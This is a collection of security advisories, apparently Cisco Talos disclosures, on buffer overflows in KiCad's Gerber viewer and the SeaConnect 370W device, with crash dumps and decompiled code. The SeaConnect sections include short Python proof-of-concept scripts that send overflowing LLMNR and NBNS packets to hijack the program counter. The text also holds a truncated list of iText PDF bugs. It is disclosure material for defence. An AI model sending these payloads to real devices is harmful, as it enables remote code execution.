A stack-based buffer overflow vulnerability exists in the Gerber Viewer gerber and excellon DCodeNumber parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

Multiple stack-based buffer overflow vulnerabilities exist in the Gerber Viewer gerber and excellon GCode/Dcode parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

KiCad EDA 6.0.1  
KiCad EDA master commit de006fc010

**Product URLs**

KiCad EDA - https://www.kicad.org/

**CVSSv3 Score**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

KiCad is a cross-platform open-source software for electronics design automation. It allows users to design and simulate electronic hardware and offers several tools like a schematic and symbol editor, PCB and footprint editor, Gerber viewer and others.

KiCad's Gerber Viewer is found in a separate binary called gerbview and allows the viewing of Gerber files, Excellon files, Gerber job files, optionally contained in zip archives.

When opening a Gerber file, the method GERBER_FILE_IMAGE::LoadGerberFile in readgerb.cpp is called:

    // size of a single line of text from a gerber file.
    // warning: some files can have *very long* lines, so the buffer must be large.
    #define GERBER_BUFZ 1000000
    // A large buffer to store one line
    static char lineBuffer[GERBER_BUFZ+1];  // [1]
    
    bool GERBER_FILE_IMAGE::LoadGerberFile( const wxString&amp; aFullFileName )
    {
        int      G_command = 0;        // command number for G commands like G04
        int      D_commande = 0;       // command number for D commands like D02
        char*    text;
    
        ClearMessageList( );
        ResetDefaultValues();
    
        // Read the gerber file */
        m_Current_File = wxFopen( aFullFileName, wxT( &#34;rt&#34; ) );
    
        if( m_Current_File == nullptr )
            return false;
    
        m_FileName = aFullFileName;
    
        LOCALE_IO toggleIo;
    
        wxString msg;
    
        while( true )
        {
            if( fgets( lineBuffer, GERBER_BUFZ, m_Current_File ) == nullptr )  // [2]
                break;
    
            m_LineNum++;
            text = StrPurge( lineBuffer );
    
            while( text &amp;&amp; *text )
            {
                switch( *text )
                {
                case &#39; &#39;:
                case &#39;\r&#39;:
                case &#39;\n&#39;:
                    text++;
                    break;
    
                case &#39;*&#39;:       // End command
                    m_CommandState = END_BLOCK;
                    text++;
                    break;
    
                case &#39;M&#39;:       // End file
                    m_CommandState = CMD_IDLE;
                    while( *text )
                        text++;
                    break;
    
                case &#39;G&#39;:    /* Line type Gxx : command */
                    G_command = GCodeNumber( text );                 // [3]
                    Execute_G_Command( text, G_command );
                    break;
    
                case &#39;D&#39;:       /* Line type Dxx : Tool selection (xx &gt; 0) or
                                 * command if xx = 0..9 */
                    D_commande = DCodeNumber( text );                // [4]
                    Execute_DCODE_Command( text, D_commande );
                    break;
    

This method takes a gerber file path, opens it and parses it line-by-line \[2\], restricting the maximum line length to 1,000,000 bytes \[1\]. When a line starting with "D" or "G" is encountered, the methods DCodeNumber \[4\] or GCodeNumber \[3\] are called. In both cases, the current line is passed as parameter. Both methods lead to the same issue. Let's detail them individually.  
Also note that the DCodeNumber method can be reached via an Excellon file in a similar way (via EXCELLON_IMAGE::LoadFile), as discussed below.

**CVE-2022-23946 - GCodeNumber**

    int GERBER_FILE_IMAGE::GCodeNumber( char*&amp; Text )
    {
        int   ii = 0;
        char* text;
        char  line[1024];          // [5]
    
        if( Text == nullptr )
            return 0;
    
        Text++;
        text = line;
    
        while( IsNumber( *Text ) ) // [6]
        {
            *(text++) = *(Text++);
        }
    
        *text = 0;                 // [7]
        ii    = atoi( line );
        return ii;
    }
    

At \[5\] a line buffer of size 1024 bytes is allocated on the stack. The while loop at \[6\] expects a number inside the line and stores the current character in the text buffer (that is, the line buffer) \[5\] and only stops when Text does not point to a number anymore.  
Because Text \[1\] is much larger than line and the loop does not check if it's operating within the line's buffer bounds, the loop could write out of bounds if a large enough line containing numbers is supplied. This is a straightforward stack-based buffer overflow that could lead to code execution. Moreover, *text is assigned to later in the same method \[7\], so corruption could occur slightly later too.

Allowed characters for IsNumber are the following:

    #define IsNumber( x ) ( ( ( (x) &gt;= &#39;0&#39; ) &amp;&amp; ( (x) &lt;=&#39;9&#39; ) )   \
                           || ( (x) == &#39;-&#39; ) || ( (x) == &#39;+&#39; )  || ( (x) == &#39;.&#39; ) )
    

**CVE-2022-23947 - DCodeNumber**

    int GERBER_FILE_IMAGE::DCodeNumber( char*&amp; Text )
    {
        int   ii = 0;
        char* text;
        char  line[1024];          // [5]
    
        if( Text == nullptr )
            return 0;
    
        Text++;
        text = line;
    
        while( IsNumber( *Text ) ) // [6]
            *(text++) = *(Text++);
    
        *text = 0;                 // [7]
        ii    = atoi( line );
        return ii;
    }
    

At \[5\] a line buffer of size 1024 bytes is allocated on the stack. The while loop at \[6\] expects a number inside the line and stores the current character in the text buffer (that is, the line buffer) \[5\] and only stops when Text does not point to a number anymore.  
Because Text \[1\] is much larger than line and the loop does not check if it's operating within the line's buffer bounds, the loop could write out of bounds if a large enough line containing numbers is supplied. This is a straightforward stack-based buffer overflow that could lead to code execution. Moreover, *text is assigned to later in the same method \[7\], so corruption could occur slightly later too.

Allowed characters for IsNumber are the following:

    #define IsNumber( x ) ( ( ( (x) &gt;= &#39;0&#39; ) &amp;&amp; ( (x) &lt;=&#39;9&#39; ) )   \
                           || ( (x) == &#39;-&#39; ) || ( (x) == &#39;+&#39; )  || ( (x) == &#39;.&#39; ) )
    

Note that this method is also used while parsing an Excellon file, when parsing a TCode. In the EXCELLON_IMAGE class we find:

    int TCodeNumber( char*&amp; aText )
    {
        return DCodeNumber( aText );
    }
    

So in this case, the DCodeNumber issue can be triggered via EXCELLON_IMAGE::Select_Tool, which eventually calls DCodeNumber.

**Crash Information**

    =================================================================
    ==1833==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffff8700 at pc 0x7fffed7df5de bp 0x7fffffff82b0 sp 0x7fffffff82a0
    WRITE of size 1 at 0x7fffffff8700 thread T0
        #0 0x7fffed7df5dd in GERBER_FILE_IMAGE::DCodeNumber(char*&amp;) src/kicad_1/gerbview/rs274d.cpp:435
        #1 0x7fffed7da342 in GERBER_FILE_IMAGE::LoadGerberFile(wxString const&amp;) src/kicad_1/gerbview/readgerb.cpp:177
        #2 0x7fffed7d8e09 in GERBVIEW_FRAME::Read_GERBER_File(wxString const&amp;) src/kicad_1/gerbview/readgerb.cpp:58
        #3 0x7fffed783cd4 in GERBVIEW_FRAME::LoadListOfGerberAndDrillFiles(wxString const&amp;, wxArrayString const&amp;, std::vector&lt;int, std::allocator&lt;int&gt; &gt; const*) src/kicad_1/gerbview/files.cpp:293
        #4 0x7fffed780004 in GERBVIEW_FRAME::LoadGerberFiles(wxString const&amp;) src/kicad_1/gerbview/files.cpp:199
        #5 0x7fffed7acfb5 in GERBVIEW_FRAME::OpenProjectFiles(std::vector&lt;wxString, std::allocator&lt;wxString&gt; &gt; const&amp;, int) src/kicad_1/gerbview/gerbview_frame.cpp:273
        #6 0x55555561eae6 in PGM_SINGLE_TOP::OnPgmInit() src/kicad_1/common/single_top.cpp:428
        #7 0x555555625b0c in APP_SINGLE_TOP::OnInit() (gerbview+0xd1b0c)
        #8 0x5555556245c1 in wxAppConsoleBase::CallOnInit() (gerbview+0xd05c1)
        #9 0x7ffff6a38799 in wxEntry(int&amp;, wchar_t**) (/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0+0x113799)
        #10 0x55555561d75a in main src/kicad_1/common/single_top.cpp:269
        #11 0x7ffff509e0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #12 0x55555561d2ed in _start (gerbview+0xc92ed)
    
    Address 0x7fffffff8700 is located in stack of thread T0 at offset 1056 in frame
        #0 0x7fffed7df229 in GERBER_FILE_IMAGE::DCodeNumber(char*&amp;) src/kicad_1/gerbview/rs274d.cpp:423
    
      This frame has 1 object(s):
        [32, 1056) &#39;line&#39; (line 426) &lt;== Memory access at offset 1056 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow src/kicad_1/gerbview/rs274d.cpp:435 in GERBER_FILE_IMAGE::DCodeNumber(char*&amp;)
    Shadow bytes around the buggy address:
      0x10007fff7090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff70d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =&gt;0x10007fff70e0:[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x10007fff70f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7100: f1 f1 f1 f1 00 00 00 f2 00 00 00 f2 00 00 00 f2
      0x10007fff7110: f2 f2 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
      0x10007fff7120: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
      0x10007fff7130: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1833==ABORTING
    

**Timeline**

2022-02-14 - Vendor Disclosure

2022-02-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-23947: TALOS-2022-1460 || Cisco Talos Intelligence Group

A stack-based buffer overflow vulnerability exists in both the LLMNR functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in both the LLMNR and NBNS functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted network packet can lead to remote code execution. An attacker can send a malicious packet to trigger either of the vulnerabilities.

**Tested Versions**

Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

10.0 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-121 - Stack-based Buffer Overflow

**Details**

The SeaConnect 370W is a Wi-Fi connected IIoT device offering programmable cloud access and control of digital and analog I/O and a 1-wire bus.

This device offers remote control via several means including MQTT, Modbus TCP and a manufacturer-specific protocol named “SeaMAX API.”

The device is built on top of the TI CC3200 MCU with built-in Wi-Fi capabilities.

The SeaConnect 370W exposes three name resolution services: LLMNR, NBNS and mDNS. The LLMNR and NBNS implementations both contain similar stack-based buffer overflows while parsing received queries. Given that LLMNR and NBNS both utilize the DNS header format with only a handful of exceptions, their parsing code is very similar. In this case, it appears to be reused from one to the next.

The vulnerability occurs when attempting to copy the queried name to a local buffer of fixed size (identified above as name_buffer). The implementation does not conduct any bounds checking prior to copying the data, simply trusting the supplied length field will be accurate and no larger than 32 bytes. Supplying a significantly large length value and queried name will result in an overflow of the stack, and ultimately in attacker control of the program counter. The overflow is limited to a maximum of 255 bytes in controllable data, as the length field is limited to a single byte.

**CVE-2021-21960 - LLMNR Buffer Overflow**

The parsing implementation for LLMNR begins at raw offset 0x1106A, which when mapped in to RAM for execution, is located at 0x2001106A.

    int __fastcall GenerateLLMNRResponse(_WORD *a1, _DWORD *a2, __int16 *query)
    {
      __int16 *offset; // r7
      __int16 id; // r10
      __int16 flags; // t1
      __int16 QDCOUNT; // t1
      __int16 ANCOUNT; // t1
      __int16 NSCOUNT; // t1
      __int16 ARCOUNT; // t1
      char *queried_name; // r7
      int name_length; // t1 MAPDST
      char *name_buffer_idx; // r1
      char curr_char; // t1
      ...
      char name_buffer[32]; // [sp+0h] [bp-68h] BYREF      [1] Fixed size, stack-allocated buffer of 32 bytes
      char response[72]; // [sp+20h] [bp-48h] BYREF
    
      offset = query + 1;
      id = htons(*query);
      flags = *offset++;
      htons(flags);
      QDCOUNT = *offset++;
      htons(QDCOUNT);
      ANCOUNT = *offset++;
      htons(ANCOUNT);
      NSCOUNT = *offset++;
      htons(NSCOUNT);
      ARCOUNT = *offset++;
      htons(ARCOUNT);
      
      name_length = *offset;                               [2] Read length octet of the queried name from attacker controlled payload
      queried_name = offset + 1;
      memset(name_buffer, 0, sizeof(name_buffer));
      for (int idx = 0; idx < name_length; idx++)          [3] Copy `name_length` bytes into stack-based variable, with no checks
      {
          name_buffer[idx] = queried_name[idx];
      }
      ...
    }
    

The copy that occurs at [3] results in a straightforward buffer overflow that will corrupt the link register value pushed on to the stack when the function was first entered. When this corrupted value is popped from the stack, the program counter will begin executing from an arbitrary attacker-controlled address.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x200014e8
    R2       = 0x20001508
    R3       = 0x00000032
    R12      = 0x20001560
    LR [R14] = 0x20011115  subroutine call return address
    PC [R15] = 0x4d4d4d4c  Program Counter
    PSR      = 0x21000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00000001
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(b'\xdf\x76\x01\x20\x00\x01\x00\x00\x00\x00\x00\x00\xff' + b'A'*100 + b'MMMM', ('<target_ip>', 5355))
    

**CVE-2021-21961 - NBNS Buffer Overflow**

The parsing implementation for NetBIOS begins at raw offset 0x10D70, which when mapped in to RAM for execution, is located at 0x20010D70. Note that the parsing implementation is the same.

    int __fastcall GenerateNBNSResponse(_WORD *a1, _DWORD *a2, __int16 *query)
    {
      __int16 *offset; // r7
      __int16 id; // r10
      __int16 flags; // t1
      __int16 QDCOUNT; // t1
      __int16 ANCOUNT; // t1
      __int16 NSCOUNT; // t1
      __int16 ARCOUNT; // t1
      char *queried_name; // r7
      int name_length; // t1 MAPDST
      char *name_buffer_idx; // r1
      char curr_char; // t1
      ...
      char name_buffer[32]; // [sp+0h] [bp-68h] BYREF      [1] Fixed size, stack-allocated buffer of 32 bytes
      char response[72]; // [sp+20h] [bp-48h] BYREF
    
      offset = query + 1;
      id = htons(*query);
      flags = *offset++;
      htons(flags);
      QDCOUNT = *offset++;
      htons(QDCOUNT);
      ANCOUNT = *offset++;
      htons(ANCOUNT);
      NSCOUNT = *offset++;
      htons(NSCOUNT);
      ARCOUNT = *offset++;
      htons(ARCOUNT);
      
      name_length = *offset;                               [2] Read length octet of the queried name
      queried_name = offset + 1;
      memset(name_buffer, 0, sizeof(name_buffer));
      for (int idx = 0; idx < name_length; idx++)          [3] Copy `name_length` bytes into stack-based variable, with no checks
      {
          name_buffer[idx] = queried_name[idx];
      }
      ...
    }
    

The copy that occurs at [3] results in a straightforward buffer overflow that will corrupt the link register value pushed on to the stack when the function was first entered. When this corrupted value is popped from the stack, the program counter will begin executing from an arbitrary attacker-controlled address.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x200014e8
    R2       = 0x00000020
    R3       = 0x00000041
    R12      = 0x20001560
    LR [R14] = 0x20010e09  subroutine call return address
    PC [R15] = 0x4d4d4d4c  Program Counter
    PSR      = 0x21000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00000001
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

**Exploit Proof of Concept**

    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(b'\xdf\x76\x01\x20\x00\x01\x00\x00\x00\x00\x00\x00\xff' + b'A'*100 + b'MMMM', ('<target_ip>', 137))
    

**Timeline**

2021-10-26 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21960: TALOS-2021-1389 || Cisco Talos Intelligence Group

A heap-based buffer overflow vulnerability exists in the OTA Update u-download functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A series of specially-crafted MQTT payloads can lead to remote code execution. An attacker must perform a man-in-the-middle attack in order to trigger this vulnerability.

**Summary**

A heap-based buffer overflow vulnerability exists in the OTA Update u-download functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A series of specially-crafted MQTT payloads can lead to remote code execution. An attacker must perform a man-in-the-middle attack in order to trigger this vulnerability.

**Tested Versions**

Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**Details**

The SeaConnect 370W is a Wi-Fi connected IIoT device offering programmable cloud access and control of digital and analog I/O and a 1-wire bus.

This device offers remote control via several means including MQTT, Modbus TCP and a manufacturer-specific protocol named “SeaMAX API.”

The device is built on top of the TI CC3200 MCU with built-in Wi-Fi capabilities.

The SeaConnect 370W implements an over-the-air firmware update mechanism which is controlled remotely from the “Sealevel SeaCloud” via an MQTTS connection. When a device comes online, it connects to the SeaCloud MQTTS broker and transmits its current firmware version. When an outdated firmware is detected, a message is published to that device’s command channel detailing the FTP(S) url containing the new image. The parsing of this message is vulnerable to a heap overflow, which can be leveraged to create a write-what-where primitive, allowing a remote attacker to overwrite arbitrary instructions and cause their execution.

The message published to the command channel to initiate a firmware update is a JSON blob which the system expects will be structured as follows:

    {
        "name": "u-download",
        "payload": "{
                                     \"uri\": \"<uri to firmware image>\",
                                     \"dest\": \"<local filename to write>\",
                                     \"crc\": \"<crc>\"
                                 }"
    }
    

Note the payload field of the JSON blob is expected to be a string containing a quote-escaped JSON blob. When an MQTT message is received with a name field containing u-download, the payload field of that message will be passed as an argument to a function named ParseToDownloadMessage, located at raw offset 0xFFFC, which is mapped to RAM for execution at 0x2000FFFC. This function is responsible for parsing the payload and populating a structure that will be used by a separate task to begin downloading and applying the described firmware update. The relevant portion of the decompilation for this function is included below. This portion of the function is responsible for unescaping the quotes contained in the payload string so that it may be parsed as a JSON object.

    int __fastcall ParseToDownloadMessage(OTAUpdateStruct *a1, char *payload)
    {
      int len; // r0
      char *reformattedPayload; // r0 MAPDST
      const char *v6; // r8
      int v8; // r2
      int result; // r0
      int v10; // r5
      char *v11; // r7
      jsonParser jParser; // [sp+0h] [bp-30h] BYREF
    
      len = MIN(strlen(payload), 256);
      reformattedPayload = malloc(len);             [1] Allocate either the length of the payload, or 256, whichever is smaller
      if ( !reformattedPayload )
      {
        Report("ERROR: SeaConnectOtaUpdate %s Allocation of reformattedPayload (%d bytes) failed\r\n", "ParseToDownloadMessage", len);
        return 0;
      }
      unescape(reformattedPayload, payload);        [2] Unescape the quotes into the recently allocated buffer, ignoring the actual length of the payload
      ...
    }
    

As noted above, at [1] a buffer is allocated that is the minimum of 256 or the length of the payload. Then, this newly allocated buffer and the original payload are passed as arguments to unescape. The unescape function is very straightforward - it acts like a call to strcpy that discards \ characters. An annotated decompilation is included below for reference.

    void unescape(char *dest, char *src)
    {
      int src_idx;
      int dest_idx;
      char curr_char;
      
      for ( src_idx = 0; src_idx < strlen(src); src_idx++ )
      {
        curr_char = src[src_idx];         
        if ( curr_char == '\\' )
        {
          continue;
        } else {
          dest[dst_idx] = curr_char;
          dst_idx++;
        }
      }
      dest[dst_idx] = '\0';
    }
    

For the purposes of this vulnerability, viewing unescape as an alias for strcpy makes it clear that the call to unescape at [2] can result in a buffer overflow. Supplying a payload larger than 256 bytes will cause an overflow on the heap. A particularly-formatted overflow can corrupt heap metadata in such a way as to allow an attacker to control the pointer that will be returned by subsequent calls to malloc. In practice, controlling the next allocated pointer is enough to gain remote code execution.

**Crash Information**

    [Hard fault handler]
    R0       = 0x00000000
    R1       = 0x00000000
    R2       = 0x00000000
    R3       = 0x200372dd
    R12      = 0x20032bd4
    LR [R14] = 0x2000cf51  subroutine call return address
    PC [R15] = 0x2000d300  Program Counter
    PSR      = 0x60000000
    BFAR     = 0xe000ed38
    CFSR     = 0x00020000
    HFSR     = 0x40000000
    DFSR     = 0x00000000
    AFSR     = 0x00000000
    

Traversing the FreeRTOS heap freelist after corruption, we observe that one of the BlockLink_ts has been modified to point to our target address.

    xStart => {
      pxNextFreeBlock = 0x2003a418, 
      xBlockSize = 48
    }
    0x2003a418 => {
      pxNextFreeBlock = 0x41414141, 
      xBlockSize = 23392
    }
    0x41414141 => {
      pxNextFreeBlock = 0x0, 
      xBlockSize = 0
    }
    

**Timeline**

2021-10-26 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21962: TALOS-2021-1390 || Cisco Talos Intelligence Group

An out-of-bounds write vulnerability exists in the URL_decode functionality of Sealevel Systems, Inc. SeaConnect 370W v1.3.34. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can perform a man-in-the-middle attack to trigger this vulnerability.

**Summary**

An out-of-bounds write vulnerability exists in the readPacket functionality of Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0. A specially-crafted MQTT payload can lead to an out-of-bounds write. An attacker can send a malicious MQTT message to trigger this vulnerability.

**Tested Versions**

Eclipse Foundation Embedded Paho MQTTClient-C library v1.0.0  
Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

Embedded Paho MQTTClient-C library - https://www.eclipse.org/paho/index.php?page=clients/c/embedded/index.php SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**Details**

The Embedded Paho MQTTClient-C library is a MQTT client library for the language C. This library is primarily designed for embedded devices.

This vulnerability was discovered while looking at the SeaConnect 370W. The mentioned device uses the Paho MQTTClient-C library version 1.0.0. In this version is present a buffer overflow vulnerability in the function readPacket. This was corrected in July 2017. This correction was treated as a security improvement, and no CVE was assigned to it. The consequence was that the SeaConnect 370W did not update its firmware with the correction. This, in turn, leads to a remote command execution vulnerability in the SeaConnect 370W due to the buffer overflow caused in the Paho MQTTClient-C library version 1.0.0.

The readPacket function in the SeaConnect 370W is:

      uint readPacket(MQTTClient *c,undefined4 param_2)
    
      {
        uint rc;
        undefined4 timer_;
        int iVar1;
        dword dVar2;
        undefined *ipstack;
        dword rem_len;
    
        read_volatile(PTR_DWORD_20012de8._0_1_);
        ipstack = c->ipstack;
        rem_len = 0;
        timer_ = TimerLeftMS(param_2);
        rc = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf,1,timer_);                                    [1]
                          /* calling mqttread ^ */
        if (rc == 1) {
          timer_ = TimerLeftMS(param_2);
          decodePacket(c,&rem_len,timer_);                                                                  [2]
          iVar1 = MQTTPacket_encode(c->readbuf + 1,rem_len);
          if (0 < (int)rem_len) {
            ipstack = c->ipstack;
            timer_ = TimerLeftMS(param_2);
            dVar2 = (**(code **)(ipstack + 0x30))(ipstack,c->readbuf + iVar1 + 1,rem_len,timer_);           [3]
                          /* calling mqttread ^ */
            if (rem_len != dVar2) {
              return 1;
            }
          }
          rc = ((uint)(byte)*c->readbuf << 0x18) >> 0x1c;
        }
        return rc;
      }
    

This is a Paho MQTTClient-C’s function that handles a new MQTT mesage. It reads at [1] the heder byte and at [2] reads, from the packet, the remaining size of the packet. This size is then used at [3] to read into a heap buffer the remaining message.

The buffer used at [3], for the SeaConnect 370W, is allocated in SeaConnectMqtt_Init:

      void SeaConnectMqtt_Init(void)
    
      {
        [...]
        
        receiveBuffer_ptr = (int *)read_volatile_4(receiveBuffer);
        puVar1 = read_volatile_4(PTR_aSeaconnectmqtt_3_20010be8);
        if (*receiveBuffer_ptr == 0) {
          malloc_res = malloc(0x201);                                                                       [4]
          *receiveBuffer_ptr = malloc_res;
        [...]
        
        }
    

At [4] 0x201 bytes are allocated to manage a MQTT mesage, but the function readPacket does not control the size of the variable rem_len before reading the message content at [3]. This can lead to a buffer overflow.

The corrected Paho MQTTClient-C’s readPacket:

    static int readPacket(MQTTClient* c, Timer* timer)
    {
        MQTTHeader header = {0};
        int len = 0;
        int rem_len = 0;
    
        /* 1. read the header byte.  This has the packet type in it */
        int rc = c->ipstack->mqttread(c->ipstack, c->readbuf, 1, TimerLeftMS(timer));
        if (rc != 1)
            goto exit;
    
        len = 1;
        /* 2. read the remaining length.  This is variable in itself */
        decodePacket(c, &rem_len, TimerLeftMS(timer));
        len += MQTTPacket_encode(c->readbuf + 1, rem_len); /* put the original remaining length back into the buffer */
    
        if (rem_len > (c->readbuf_size - len))                                                              [5]
        {
            rc = BUFFER_OVERFLOW;
            goto exit;
        }
    
        /* 3. read the rest of the buffer using a callback to supply the rest of the data */
        if (rem_len > 0 && (rc = c->ipstack->mqttread(c->ipstack, c->readbuf + len, rem_len, TimerLeftMS(timer)) != rem_len)) {
            rc = 0;
            goto exit;
        }
    
        header.byte = c->readbuf[0];
        rc = header.bits.type;
    exit:
        return rc;
    }
    

A size check was introduced at [5] to avoid the buffer overflow.

The nature of the buffer overflow depends upon the library user. Indeed, the buffer used in readPacket is provided by the library utilizer and not allocated by the Paho MQTTClient-C library.

**Timeline**

2021-10-27 - Initial vendor contact  
2021-11-03 - Vendor disclosure  
2022-02-01 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

CVE-2021-21971: TALOS-2021-1406 || Cisco Talos Intelligence Group

iText v7.1.17 was discovered to contain a stack-based buffer overflow via the component ByteBuffer.append, which allows attackers to cause a Denial of Service (DoS) via a crafted PDF file.

**Unqiue Bugs Found**

Recently we (\[Zhang Cen\](https://github.com/occia) , \[Huang Wenjie\](https://github.com/ZanderHuang) and \[Zhang Xiaohan\](https://github.com/Han0nly)) discovered a series of bugs in latest itextpdf (version 7.1.17). Every bug we reported in the following is unique and reproducable. Furthermore, they have been manually analyzed and triaged in removing the duplicates.  
Due to the lack of contextual knowledge in the itextpdf library, we cannot thoroughly fix some bugs hence we look forward to any proposed plan from the developers in fixing these bugs.

**Bug Report**

The bug report folder can be downloaded from https://drive.google.com/drive/folders/1b38Mi8fKp05vzMbth1oiopFYNH92GWrK?usp=sharing

Total 56 bugs are reported in this pull request.  
A full list is provided below.

**Folder structure**

*   Level 1 (folder): exception type
*   Level 2 (folder): error location
*   Level 3 (files): POC file and **report.txt** including reproducing steps

**report.txt content:**

1.  Exception type
2.  Error location
3.  Bug cause and impact
4.  Crash thread's stacks
5.  Steps to reproduce

**Bug full list**

1.  java.lang.ArrayIndexOutOfBoundsException  
    \-- com.itextpdf.kernel.crypto.ARCFOUREncryption.encryptARCFOUR--ARCFOUREncryption.java-93  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard128.computeOwnerKey--StandardHandlerUsingStandard128.java-81  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.clear--PdfXrefTable.java-448  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.get--PdfXrefTable.java-153  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.initFreeReferencesList--PdfXrefTable.java-185
2.  java.lang.ClassCastException  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard40.initKeyAndReadDictionary--StandardHandlerUsingStandard40.java-193  
    \-- com.itextpdf.kernel.pdf.PdfDocument.open--PdfDocument.java-1958  
    \-- com.itextpdf.kernel.pdf.PdfEncryption.readAndSetCryptoModeForStdHandler--PdfEncryption.java-531  
    \-- com.itextpdf.kernel.pdf.PdfEncryption.readAndSetCryptoModeForStdHandler--PdfEncryption.java-534  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344
3.  java.lang.NegativeArraySizeException  
    \-- com.itextpdf.kernel.pdf.PdfXrefTable.extendXref--PdfXrefTable.java-598
4.  java.lang.NullPointerException  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardHandlerUsingStandard40.initKeyAndReadDictionary--StandardHandlerUsingStandard40.java-194  
    \-- com.itextpdf.kernel.crypto.securityhandler.StandardSecurityHandler.getIsoBytes--StandardSecurityHandler.java-94  
    \-- com.itextpdf.kernel.pdf.PdfArray.get--PdfArray.java-374  
    \-- com.itextpdf.kernel.pdf.PdfObjectWrapper.markObjectAsIndirect--PdfObjectWrapper.java-141  
    \-- com.itextpdf.kernel.pdf.PdfReader.getOriginalFileId--PdfReader.java-669  
    \-- com.itextpdf.kernel.pdf.PdfReader.readDecryptObj--PdfReader.java-1287  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObject--PdfReader.java-1344  
    \-- com.itextpdf.kernel.pdf.PdfReader.readObjectStream--PdfReader.java-738  
